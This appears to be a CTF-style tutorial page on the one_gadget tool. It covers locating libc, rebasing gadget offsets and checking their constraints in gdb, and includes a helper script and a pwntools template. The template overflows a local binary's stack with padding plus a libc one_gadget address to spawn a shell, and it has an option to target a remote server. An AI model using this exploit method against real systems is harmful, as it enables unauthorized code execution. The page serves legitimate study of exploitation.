description: 08/25/2023

ONE_GADGET

{% embed url="https://github.com/david942j/one_gadget" %}

Installation

Install ruby-rubygems if you don't already have it:

sudo apt install ruby-rubygems

Install one_gadget:

gem install one_gadget

Usage

Find libc library:

ldd <binary>

        linux-vdso.so.1 (0x00007ffd3f71f000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f7029d40000)
        /lib64/ld-linux-x86-64.so.2 (0x00007f7029f74000)

libc library:

/lib/x86_64-linux-gnu/libc.so.6

Using one_gadget:

one_gadget /lib/x86_64-linux-gnu/libc.so.6

We end up with a few gadget offsets to work with, each listed together with its constraints.

The address to use is libc base + offset.

A gadget is enough to get a shell only if its constraints (the register and stack conditions one_gadget prints) hold at the moment it executes.

Break at the point of execution in gdb and inspect the registers to see whether the constraints are met; if they are not, that gadget will not give you a shell and you need to try another one.
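The two steps above, rebasing each offset onto the libc base and checking the constraints against the register state seen in gdb, as an added example that is not part of this page or of one_gadget itself. The one_gadget output, register snapshot and libc base value are constructed for illustration, and only the simple register-form constraints are decided; anything else (such as "address ... is writable") is reported as unknown.

```python
import re

# Constructed sample in one_gadget's output format; offsets and constraints are
# illustrative and not copied from any particular libc build.
ONE_GADGET_OUTPUT = """\
0xebc81 execve("/bin/sh", r10, rdx)
constraints:
  address rsp+0x50 is writable
  [r10] == NULL || r10 == NULL
  [rdx] == NULL || rdx == NULL

0xebcf8 execve("/bin/sh", rsp+0x40, environ)
constraints:
  rsp & 0xf == 0
  rcx == NULL
"""

def parse_gadgets(text):
    """[(offset, [constraint, ...]), ...] parsed from one_gadget's text output."""
    gadgets = []
    for block in text.strip().split("\n\n"):
        lines = block.splitlines()
        offset = int(lines[0].split()[0], 16)
        gadgets.append((offset, [l.strip() for l in lines[1:] if l.startswith("  ")]))
    return gadgets

def check_term(term, regs, mem):
    """True/False for one '||' alternative; None if the form is not handled here.
    mem maps address -> qword; memory absent from the snapshot counts as non-NULL."""
    if m := re.fullmatch(r"(\w+) == NULL", term):
        return regs.get(m[1]) == 0
    if m := re.fullmatch(r"\[(\w+)(?:\+0x([0-9a-f]+))?\] == NULL", term):
        return mem.get(regs.get(m[1], 0) + int(m[2] or "0", 16)) == 0
    if m := re.fullmatch(r"(\w+) & 0x([0-9a-f]+) == 0", term):
        return regs.get(m[1], 0) & int(m[2], 16) == 0
    return None

def check_constraint(constraint, regs, mem):
    """A constraint holds if any alternative holds; None when nothing is decidable."""
    verdicts = [check_term(t.strip(), regs, mem) for t in constraint.split("||")]
    return True if True in verdicts else (False if all(v is False for v in verdicts) else None)

def classify_gadgets(text, libc_base, regs, mem):
    """Rebase each gadget to libc_base + offset and label it ok / fail / unknown."""
    out = []
    for offset, constraints in parse_gadgets(text):
        verdicts = [check_constraint(c, regs, mem) for c in constraints]
        status = "fail" if False in verdicts else "ok" if all(verdicts) else "unknown"
        out.append((libc_base + offset, status))
    return out
```

Feed it the register values shown by gdb at the breakpoint and the libc base from vmmap; an "ok" gadget's address is what goes into the payload, an "unknown" one still needs a manual look at the memory map.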

The following script helps with this: with debug logging on, you will see the libc location and the gadget offset being added to it in the payload that is sent:

from pwn import *
import sys


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
break *0x401179
continue
'''.format(**locals())


# Binary filename
exe = './secureserver'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe)
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Libc used by the binary (found with ldd above); offsets found manually (ASLR_OFF)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# With ASLR off the libc base is fixed, so set it here: the value is the one from
# the ldd output above, verify it with vmmap in gdb. Without this line libc.address
# stays 0 and only the bare one_gadget offset would be sent.
libc.address = 0x7f7029d40000

# RET and POP RDI gadgets (found with ropper); not needed by this one_gadget payload
ret = 0x401016
pop_rdi = 0x40120b

# How many bytes to the instruction pointer (RIP)?
padding = 72

# Payload to spawn shell: padding, then libc base + one_gadget offset
payload = flat(
    asm('nop') * padding,
    libc.address + 0xebcf8
)

# Write payload to file
write('payload', payload)

# Exploit
io.sendlineafter(b':', payload)

# Get flag/shell
io.interactive()

In the debug output you can see the sent bytes, i.e. libc.address + offset, which is the address of the gadget.